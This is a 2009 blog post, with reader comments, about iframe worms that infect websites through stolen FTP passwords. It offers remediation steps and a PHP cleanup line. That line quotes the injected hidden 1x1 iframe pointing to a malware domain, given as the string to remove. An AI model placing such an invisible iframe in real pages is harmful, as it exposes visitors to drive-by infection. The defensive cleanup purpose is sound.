I use Opera!

iframe worms: xtrarobotz.com, superbetfair.cn, lotmachinesguide.cn

I found that lot of people sites (joomla, wordpress, smf forum, static ones) get infected with these versions of iframe viruses too. Probably they are same variants of goooogleadsence.biz, cutlot.cn, google-ana1yticz.com, mixante.cn worms. You can read my problems with this worms in one of my previous posts, also there is bunch of useful comments there… My server antivirus detects them all as exploit.html.iframe-6. As it is known these viruses infect your pc, and take ftp password from your ftp programs like filezilla and then infect every index file on you server that you have right to write.
Steps to clean this pest are to download latest antivirus software and clean your pc. NOD32 2.7 with latest definitions or Avast free will clean this worms from your pc. Then change all cpanel and user accounts passwords. After that, bring your clean backup of public html files. If your site is too big for bringing backup files there is removal tool you can download it here: iframe worms removal tool.
Thanks to Dragos for this. He left it in my comment for previous thread about this pest.

Be careful by using this script. I destroyed all my .php and .html files with it on one of my sites. First download your site offline and try this on some standalone php mysql apache server (wamp, lamp, jsas).  Also your antivirus will maybe detect this file as a virus since it contain line bellow with the instruction which virus it needs to remove.

iframe worm removal tool

You need to locate and change the following line in the script
$data = str_replace ( ‘<iframe src=”http:// mixante  .cn/  in.cgi? income53″ width=1 height=1 style=”visibility: hidden”></iframe>’ , “” , $data);

according to the virus with whom you are infected, if you are infected with multiple variant, just change the line and run the script for every different worm occurence. You will find the iframe code in your infected index.html and other files usualy above </body> tag. Then simply upload it to your server and run clean.php from your browser.  Make backup first and test it offline or on copy of your site.

It would be great if someone experienced with php can use this script to make graphical interface and some security measures so you can not overwrite all of your site source files with zeros as I did, and then give the code back to community, since there are thousand of sites infected around…

As I said running this script is potentially dangerous. I am not responsible if you destroy your site with this script. It worked for me and I removed the worm with this removal tool from my big wordpress, smf  and joomla sites… Make backup first and test if offline. Also do not forget to clean your pc and change ftp/cpanel passwords or this pest will comeback again. You can also overwrite your infected cms installations with the new versions of them, but you will need to clean template and  personal files manually… Just save your configuration files and your customized template files…

If you have any infos about these worms, and you have more informations it would be great that you share them here…

Related posts:

  1. Benefits of Using an Article Submission Script for SEO Have you thought about automating the article submission process? Well,...

Posted in Uncategorized — Hellas @ 1:38 pm @ April 18, 2009

6 Comments »

  1. Same problem :(

    Point is, I don’t know where is started?
    I deleted it more than 3 times :s

    Comment by Hans — April 23, 2009 @ 10:25 am

  2. same problem too

    Comment by narcys — May 12, 2009 @ 10:58 am

  3. This kind to remove is senseless. Each worm nests in an absolute other way to a website. In many cases the iframe-code is encrypted with javascript and the hackers and their worms change their traces permanently. It is hopeless to be a lone-warrior against hacking and worms. The only acceptable way i found for me was to be always informed by http://www.hackalert24.com, when my website is hacked, so that i can react as fast as possible to restore a backup. The database of them is compareable with a virusdatabase of antivirus companies. They are always up to date and make the war against hacking really easier.

    Comment by Leo — May 21, 2009 @ 8:49 am

  4. This particular malware is planted on your website because your FTP userid and password has been stolen. Someone who has FTP access to your server has had malware planted on their box which is giving their userids and passwords to a criminal. When he sees he has an FTP userid and password, he logs in to the site and adds IFRAMEs to webpages there.

    To fix, you must change your FTP userid and password, and also determine which webmaster has the compromise on their home computer.

    Comment by Gary Warner — June 6, 2009 @ 9:30 pm

  5. i just faced with this today :

    i used your script,and get rid of this iframes thank you very much :)

    But it made some blank tails on the files, for example, rss feeds xml docs, started with a blank line and did not work, or pages start with a blank line.

    But thia little plugin solved this issue, fixed my rss and my wordpress is fixex over 320 files . my wp
    back on work :

    http://wordpress.org/extend/plugins/fix-rss-feed/

    Thank you very much, You saved me :)

    Comment by kobzeci — June 6, 2009 @ 11:20 pm

  6. i used your script,and get rid of this iframes thank you very much

    Comment by seamless steel pipe — February 22, 2010 @ 9:33 am

RSS feed for comments on this post. TrackBack URI

Leave a comment